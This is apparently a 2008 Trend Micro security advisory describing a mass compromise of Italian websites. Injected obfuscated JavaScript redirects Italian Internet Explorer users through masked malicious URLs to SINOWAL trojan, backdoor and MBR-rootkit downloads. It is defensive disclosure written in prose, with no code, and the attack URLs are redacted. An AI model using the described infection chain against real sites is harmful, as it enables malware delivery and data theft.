In what may turn out to be an advanced one-year “toast” to the June 2007 mass infection that came to be known as the Italian Job, TrendLabs discovered 90 compromised Italian Web sites (all verified active as of this writing) at around 12:30 AM GMT. The compromised sites are varied; their only common thematic link seems to be the Italian language.

According to Trend Micro analysts, the attack rolls out like this:

1. The compromised Web sites contain obfuscated JavaScript code (detected as JS_AFIR.A) that redirects the browser to the malicious URL http://{BLOCKED}r.com/cgi-bin/index.cgi?grb&js=1.

The script checks the Internet Explorer version and language so it will only execute on Italian ones.

2. The said URL redirects to another URL: http://{BLOCKED}f.com/cgi-bin/index.cgi?grobin (blocked by Web Reputation Services since April 27).

The two malicious sites were found to be hosted in a single IP traced back to San Diego, California.

3. The said sites download TROJ_SINOWAL.CB (detected since April 26 GMT) from the same domain. TROJ_SINOWAL.CB then drops BKDR_SINOWAL.CF (detected since April 30 GMT), which in turn drops a rootkit component on the affected PC.

This rootkit component modifies certain sectors of the infected hard disk. It also hooks Driver.sys to protect these sectors from read and write operations from AV/security software.

See infection diagram below.

SINOWAL malware variants are known information stealer droppers.

As of this writing, TrendLabs has discovered two forms of this compromise: one is via an injected obfuscated script that redirects to a certain malicious URL, and the other is via a readable iFrame and the same obfuscated script.

It appears that this attack affects sites hosted in Italy by a single hosting provider — the same one that hosted the thousands of sites (mostly travel and leisure) in last year’s large-scale infection. This time, compromised sites include the following:

• The official site of Monica Bellucci (famous Italian model-actress)
• The Mercedes-Benz club of Italy
• The official Web page of Sabrina Salerno (Italian singer)
• A Johnny Depp fan site
• A fan site of Pearl Jam

Here are screenshots of the first three sites mentioned above:

Trend Micro customers are already protected from this threat. Web Threat Protection technology has prevented access to the malicious pages since 27 April 2008. The URLs have already been added to our emergency database and are blocked by WCS (Web Classify Server), making these accessible to customers. Also, the RootkitBuster tool is able to scan the MBR-rootkit component involved in this attack.

Last updated at 5:27 PM GMT, 3 May 2008